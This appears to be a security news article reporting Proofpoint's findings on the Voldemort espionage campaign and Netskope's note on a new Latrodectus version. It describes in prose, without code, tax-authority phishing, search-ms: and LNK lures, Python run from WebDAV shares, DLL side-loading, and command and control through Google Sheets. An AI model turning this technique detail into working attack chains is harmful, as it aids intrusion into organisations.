A novel malware campaign has been discovered by cybersecurity experts, utilizing Google Sheets as a control mechanism for malware.
The malicious campaign, initially detected by Proofpoint on August 5, 2024, involves impersonating tax authorities from various countries in Europe, Asia, and the United States. The main objective is to target more than 70 organizations globally using a specialized tool named Voldemort, which is designed to collect data and deploy additional malware payloads.
The sectors being targeted include insurance, aerospace, transportation, education, finance, technology, manufacturing, healthcare, automotive, hospitality, energy, government, media, telecommunications, and nonprofit organizations.
Although the cyber espionage campaign has not been linked to any specific threat actor, it is reported that around 20,000 fraudulent emails have been sent as part of the attack.
The fraudulent emails claim to originate from tax authorities in several countries, including the U.S., U.K., France, Germany, Italy, India, and Japan. These emails notify recipients of changes in their tax filings and prompt them to click on Google AMP Cache URLs, directing them to an intermediary landing page.
The landing page inspects the User-Agent string to check for Windows operating system and then exploits the search-ms: URI protocol handler to display a Windows shortcut (LNK) file disguised as an Adobe Acrobat Reader PDF file, attempting to deceive the victim into opening it.
When the LNK file is executed, it triggers PowerShell to execute Python.exe from a third WebDAV share on the same network, passing a Python script from another share located on the same host as an argument, as indicated by Proofpoint researchers Tommy Madjar, Pim Trouerbach, and Selena Larson.
“This prompts Python to execute the script without downloading any files locally, with dependencies being loaded directly from the WebDAV share,” the researchers explained.
The Python script’s purpose is to collect system data and transmit it in the form of a Base64-encoded string to a domain controlled by the threat actors. Subsequently, it displays a fake PDF to the user and downloads a password-protected ZIP file from OpenDrive.
The ZIP file comprises two components: a valid executable file “CiscoCollabHost.exe” vulnerable to DLL side-loading and a malicious DLL file “CiscoSparkLauncher.dll” (referred to as Voldemort) that is side-loaded.
Voldemort is a custom backdoor coded in C that is equipped with functionalities for data retrieval and executing subsequent malware stages, utilizing Google Sheets for command and control operations, data exfiltration, and command execution as directed by the attackers.
Proofpoint has described the operation as being linked to advanced persistent threats (APT) but exhibiting characteristics of cybercrime due to the adoption of tactics commonly seen in the cyber underworld.
“Threat actors misuse file schema URIs to access external resources for malware staging, specifically WebDAV and Server Message Block (SMB). This is achieved by leveraging the schema ‘file://’ and pointing to a remote server hosting the malicious content,” the report stated.
This approach has become more prevalent among malware strains acting as initial access brokers (IABs), such as Latrodectus, DarkGate, and XWorm.
Furthermore, Proofpoint claimed to have gained access to the contents of the Google Sheet, identifying a total of six victims, including one believed to be a testing environment or a security researcher.
The campaign is considered atypical, suggesting that the threat actors initially cast a wide net before narrowing down the targets. It is presumed that the attackers, likely possessing varying levels of technical knowledge, intended to infiltrate multiple organizations.
“While the campaign exhibits characteristics of cybercriminal activities, we believe this is likely an espionage attempt aimed at yet undisclosed final objectives,” the researchers noted.
“The blend of sophisticated and basic capabilities makes it challenging to gauge the threat actors’ capabilities accurately and determine the campaign’s core objectives with certainty.”
The discovery coincides with Netskope Threat Labs unveiling an updated version of Latrodectus (version 1.4), which includes a new C2 endpoint and introduces two fresh backdoor commands enabling it to fetch shellcode from a specified server and fetch arbitrary files from remote locations.
“Latrodectus has been evolving rapidly, incorporating new features into its payload,” remarked security researcher Leandro Fróes. “Understanding the enhancements in its payload enables defense teams to adjust their automated processes and use the information for detecting new variants.”
About Author
